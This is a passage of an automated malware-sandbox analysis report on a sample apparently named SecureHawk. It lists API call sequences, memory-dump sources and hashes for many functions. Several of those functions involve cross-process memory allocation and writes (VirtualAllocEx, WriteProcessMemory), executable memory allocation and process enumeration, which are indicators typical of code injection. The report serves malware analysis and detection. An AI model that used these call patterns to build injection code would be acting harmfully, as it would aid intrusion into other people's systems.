                                    • Part of subcall function 00351B27: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00349C31,?,?,00000034,00000800,?,00000034), ref: 00351B51
                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0034A1DA
                                    • Part of subcall function 00351AF2: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00349C60,?,?,00000800,?,00001073,00000000,?,?), ref: 00351B1C
                                    • Part of subcall function 00351A49: GetWindowThreadProcessId.USER32(?,?), ref: 00351A74
                                    • Part of subcall function 00351A49: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00349BF5,00000034,?,?,00001004,00000000,00000000), ref: 00351A84
                                    • Part of subcall function 00351A49: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00349BF5,00000034,?,?,00001004,00000000,00000000), ref: 00351A9A
                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0034A247
                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0034A294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                  • String ID: @
                                  • API String ID: 4150878124-2766056989
                                  • Opcode ID: 2ccb015d3be3dd32123725cbc81cb40b1a7c968d5b9e3622dd0aa6952c62e3cd
                                  • Instruction ID: 2159fb0ba6cacde41cbd4d85eb723e4f568a602c4457abb0281267d8774b628f
                                  • Opcode Fuzzy Hash: 2ccb015d3be3dd32123725cbc81cb40b1a7c968d5b9e3622dd0aa6952c62e3cd
                                  • Instruction Fuzzy Hash: 99414C76901218AFDB12DFA4CC81FDEBBB8EF49300F004095FA55BB191DA716E49DBA1
                                  APIs
                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0037784E
                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00377862
                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00377886
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window
                                  • String ID: SysMonthCal32
                                  • API String ID: 2326795674-1439706946
                                  • Opcode ID: f87ed7b89d09e071e71eb1658b5f7538610de45b82fbe85d18384ea117d9cef4
                                  • Instruction ID: 269f42ad67c1506d8f3c341b3f241a632f10ca8a495ab730ed6ccdce4e355899
                                  • Opcode Fuzzy Hash: f87ed7b89d09e071e71eb1658b5f7538610de45b82fbe85d18384ea117d9cef4
                                  • Instruction Fuzzy Hash: 6721D132600218BBDF26CF54CC46FEA3B79EF88714F114214FE586B190D6B5AC65CB90
                                  APIs
                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00377128
                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00377138
                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0037715D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend$MoveWindow
                                  • String ID: Listbox
                                  • API String ID: 3315199576-2633736733
                                  • Opcode ID: 900e8453af9ea3fb24312162915360ac31e6a300751dd239a8a44e4443119219
                                  • Instruction ID: f2a773693c9913c8dcc24f745aeb75fbad2009304a90fe8a81a7b30bbdb1208d
                                  • Opcode Fuzzy Hash: 900e8453af9ea3fb24312162915360ac31e6a300751dd239a8a44e4443119219
                                  • Instruction Fuzzy Hash: E7218032614118BFEF268F54CC45FBB37AEEB89764F018124FA089B190DA75AC518BA0
                                  APIs
                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00377B5F
                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00377B74
                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00377B81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: msctls_trackbar32
                                  • API String ID: 3850602802-1010561917
                                  • Opcode ID: 6aeaec63e5715db31f268c8f2c68b052d767e75ed07418f10aafebbe2b51a032
                                  • Instruction ID: bf18837af886e6b6e4879a7e25b006fcd3f44bb9371659c724ad357d236a2362
                                  • Opcode Fuzzy Hash: 6aeaec63e5715db31f268c8f2c68b052d767e75ed07418f10aafebbe2b51a032
                                  • Instruction Fuzzy Hash: 6111E732244208BBEF255F60CC06FEB77ADEF89758F124518FB59A7090D275D811DB20
                                  APIs
                                    • Part of subcall function 0032B474: _memset.LIBCMT ref: 0032B481
                                    • Part of subcall function 00310A9F: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0032B450,?,?,?,002F100A), ref: 00310AA4
                                  • IsDebuggerPresent.KERNEL32(?,?,?,002F100A), ref: 0032B454
                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,002F100A), ref: 0032B463
                                  Strings
                                  • =9, xrefs: 0032B444
                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0032B45E
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=9
                                  • API String ID: 3158253471-2880903965
                                  • Opcode ID: d2d4e885ea4e89cd04518707ee25b8186092e89004fb95019be470df94cd6ff6
                                  • Instruction ID: d59f107d61b0de123411413925980a19e571092891d534db87508bca17daf088
                                  • Opcode Fuzzy Hash: d2d4e885ea4e89cd04518707ee25b8186092e89004fb95019be470df94cd6ff6
                                  • Instruction Fuzzy Hash: A2E092B42007118FD776AF36E944742BBE8AF04744F01895DE485C6352DBF4E548CB51
                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,003301AA,?), ref: 0036C4AF
                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0036C4C1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                  • API String ID: 2574300362-1816364905
                                  • Opcode ID: daaa43313e484f1c4adc045726c0a5e136090bb8ebb27b4c8eb5fd447135a597
                                  • Instruction ID: 65bf0a1342de4f13ffbfd4c2ea23c38b0ffe387cdca8608f2d1af11868801184
                                  • Opcode Fuzzy Hash: daaa43313e484f1c4adc045726c0a5e136090bb8ebb27b4c8eb5fd447135a597
                                  • Instruction Fuzzy Hash: 98E0C23D5107128FE7639B26C818BA276D8BF15755F41D4A9E8CBD2264EB74D840C710
                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00304B44,?,003049D4,?,?,003027AF,?,00000001), ref: 00304B85
                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00304B97
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                  • API String ID: 2574300362-3689287502
                                  • Opcode ID: c751d132694498bdb43ed0fe9526c698c61a582c02e98dfe3249881ece32d3bd
                                  • Instruction ID: 11d1e6ab5f93cfdb1d582beaa68fa12960261327881e34763eb226a121dc8ad0
                                  • Opcode Fuzzy Hash: c751d132694498bdb43ed0fe9526c698c61a582c02e98dfe3249881ece32d3bd
                                  • Instruction Fuzzy Hash: B1D012745107128FD7266F31D8297467AD8AF05751F55C869D4D6E2190D770D884C710
                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00304AF7,?), ref: 00304BB8
                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00304BCA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                  • API String ID: 2574300362-1355242751
                                  • Opcode ID: fe63b34373212dcaa1b99d843b29369ad1e91ad9d3c0f245361ccdaa72676043
                                  • Instruction ID: e2fe7d154d5f82d1dc1c3242118bc3ae95d8f58b161f89d5bc9941c4655bbcb8
                                  • Opcode Fuzzy Hash: fe63b34373212dcaa1b99d843b29369ad1e91ad9d3c0f245361ccdaa72676043
                                  • Instruction Fuzzy Hash: D1D0C7B48003128FD322AF30D808B4672E8AF01360F128CAAD8C2D25A0EB70C980CB00
                                  APIs
                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,0037145E), ref: 0037121D
                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0037122F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                  • API String ID: 2574300362-4033151799
                                  • Opcode ID: 9ae633f546de78938d9f48dafd878452ca1bc24c08facdc97c5997e4359cba43
                                  • Instruction ID: 8e655dd18a51eb839e23c65252f2c7d92e6e61c53ddf801433c6303cedfbad63
                                  • Opcode Fuzzy Hash: 9ae633f546de78938d9f48dafd878452ca1bc24c08facdc97c5997e4359cba43
                                  • Instruction Fuzzy Hash: A7D0C2328407128FC3264F34C80925276D8EF2A352F11CD29D4C6D6150DB74C480C700
                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,003691A6,?,00380980), ref: 003695A0
                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003695B2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetModuleHandleExW$kernel32.dll
                                  • API String ID: 2574300362-199464113
                                  • Opcode ID: fe4fbefd90a0151bbe923d21da1470198da7fe7a20c201397de9984c96ed72f0
                                  • Instruction ID: def9891ff945fca076cd09356812fececdf4eaf53e02f151c5ca5fa4a422ff85
                                  • Opcode Fuzzy Hash: fe4fbefd90a0151bbe923d21da1470198da7fe7a20c201397de9984c96ed72f0
                                  • Instruction Fuzzy Hash: 86D012745107128FD7276F31C85C74676E8AF05752F11CC6AD8C6D6558D7B0C484C710
                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00305E3D), ref: 003055FE
                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00305610
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                  • API String ID: 2574300362-192647395
                                  • Opcode ID: f6a9bc661989421d62a8c3a6afa3332e6929d19949fe58acd5adc76b2cc00544
                                  • Instruction ID: a718f3b3fe754954592985fae5d6edabf9fac02973031c8b7d42d2bcdd78d459
                                  • Opcode Fuzzy Hash: f6a9bc661989421d62a8c3a6afa3332e6929d19949fe58acd5adc76b2cc00544
                                  • Instruction Fuzzy Hash: D0D0C738820B128FE366AF34C82824776E8AF00361F1688AAD4C2D21A0E770C884CB40
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9343c8d877fb88a49a188a5d55a4ae53078d61e2c8da084e31ed9b065ef9588d
                                  • Instruction ID: 9ce2f64ba5ad8f1ca6c0a07ba41685ac89e816d113218a9a9fdd0d893dd8e22a
                                  • Opcode Fuzzy Hash: 9343c8d877fb88a49a188a5d55a4ae53078d61e2c8da084e31ed9b065ef9588d
                                  • Instruction Fuzzy Hash: 44C13A75A04216EFCB15CFA8C884AAEBBF9FF48714B158598E805EF251D730ED81CB90
                                  APIs
                                  • CharLowerBuffW.USER32(?,?), ref: 0036E56F
                                  • CharLowerBuffW.USER32(?,?), ref: 0036E5B2
                                    • Part of subcall function 0036DC56: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0036DC76
                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0036E7B2
                                  • _memmove.LIBCMT ref: 0036E7C5
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                  • String ID:
                                  • API String ID: 3659485706-0
                                  • Opcode ID: e265bcc0c4947e8b4444f50c7ab589672496fd27472699bb80ab2503c279f2ec
                                  • Instruction ID: 0e1a8650e1ecab953ce8dc97d5cb7935b0fd71134238dec6c4c1821a2cd44503
                                  • Opcode Fuzzy Hash: e265bcc0c4947e8b4444f50c7ab589672496fd27472699bb80ab2503c279f2ec
                                  • Instruction Fuzzy Hash: 54C16975A083018FC706DF28C48096ABBE4FF88718F14896DF9999B351D771E94ACF92
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 00368575
                                  • CoUninitialize.OLE32 ref: 00368580
                                    • Part of subcall function 0037DC66: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,003687D6,?,00000000), ref: 0037DCCE
                                  • VariantInit.OLEAUT32(?), ref: 0036858B
                                  • VariantClear.OLEAUT32(?), ref: 0036885C
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                  • String ID:
                                  • API String ID: 780911581-0
                                  • Opcode ID: 5d05619aa706f73b119cae2a10370f64ae88593f983d2000627fd91d8885b020
                                  • Instruction ID: d825a2f31daa1437da146e4048c9481752f0b6f13f69488353a0e8bd6ae6cf02
                                  • Opcode Fuzzy Hash: 5d05619aa706f73b119cae2a10370f64ae88593f983d2000627fd91d8885b020
                                  • Instruction Fuzzy Hash: F6A15675214B059FC711EF14C481B2AB7E4BF8C354F148958FA9A9B3A2CB70ED44CB92
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Variant$AllocClearCopyInitString
                                  • String ID:
                                  • API String ID: 2808897238-0
                                  • Opcode ID: 729af8f8ae62fc64b83240b17fc73d771053de6403b6baebe4ad3aa623863377
                                  • Instruction ID: df8f7e017ae0e00b4b83aa6a2cdcbc24ec4de3b599471e07ecd4a94e45b29809
                                  • Opcode Fuzzy Hash: 729af8f8ae62fc64b83240b17fc73d771053de6403b6baebe4ad3aa623863377
                                  • Instruction Fuzzy Hash: E051C7346187059ADB26AF76D891A3DF7EDEF58321F20881FE546CF791DB70A8808B11
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0036F2EE
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0036F2FC
                                    • Part of subcall function 00301A36: _memmove.LIBCMT ref: 00301A77
                                  • Process32NextW.KERNEL32(00000000,?), ref: 0036F3BC
                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0036F3CB
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                  • String ID:
                                  • API String ID: 2576544623-0
                                  • Opcode ID: 2a6c54ef5b8d191a67a067ef5be7f28eb05188bcaaf696c6ed3e6dd9819585e1
                                  • Instruction ID: 6e83ecb38c6cab4ac882cee358350d188d7633e31638a1ab06dc80e60b27000b
                                  • Opcode Fuzzy Hash: 2a6c54ef5b8d191a67a067ef5be7f28eb05188bcaaf696c6ed3e6dd9819585e1
                                  • Instruction Fuzzy Hash: EE518C71104311AFD312EF20DC86E6BB7E8EF98750F10492DF595972A2EB70E908CB92
                                  APIs
                                  • GetWindowRect.USER32(?,?), ref: 00379C50
                                  • ScreenToClient.USER32(00000002,00000002), ref: 00379C83
                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00379CF0
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$ClientMoveRectScreen
                                  • String ID:
                                  • API String ID: 3880355969-0
                                  • Opcode ID: f352ea3c5f0ba1cf0ce1866e32b3076525b4c6a9bbd82151108f2b167f534d51
                                  • Instruction ID: 7ffd9d2b2a6124f078a2018b18dc853f82956b834ce7adcddc8597ed587206c3
                                  • Opcode Fuzzy Hash: f352ea3c5f0ba1cf0ce1866e32b3076525b4c6a9bbd82151108f2b167f534d51
                                  • Instruction Fuzzy Hash: 61515E71A00209EFCF26DF54C881AAE7BF6FF45360F11825AF9199B2A1D734AD41CB90
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
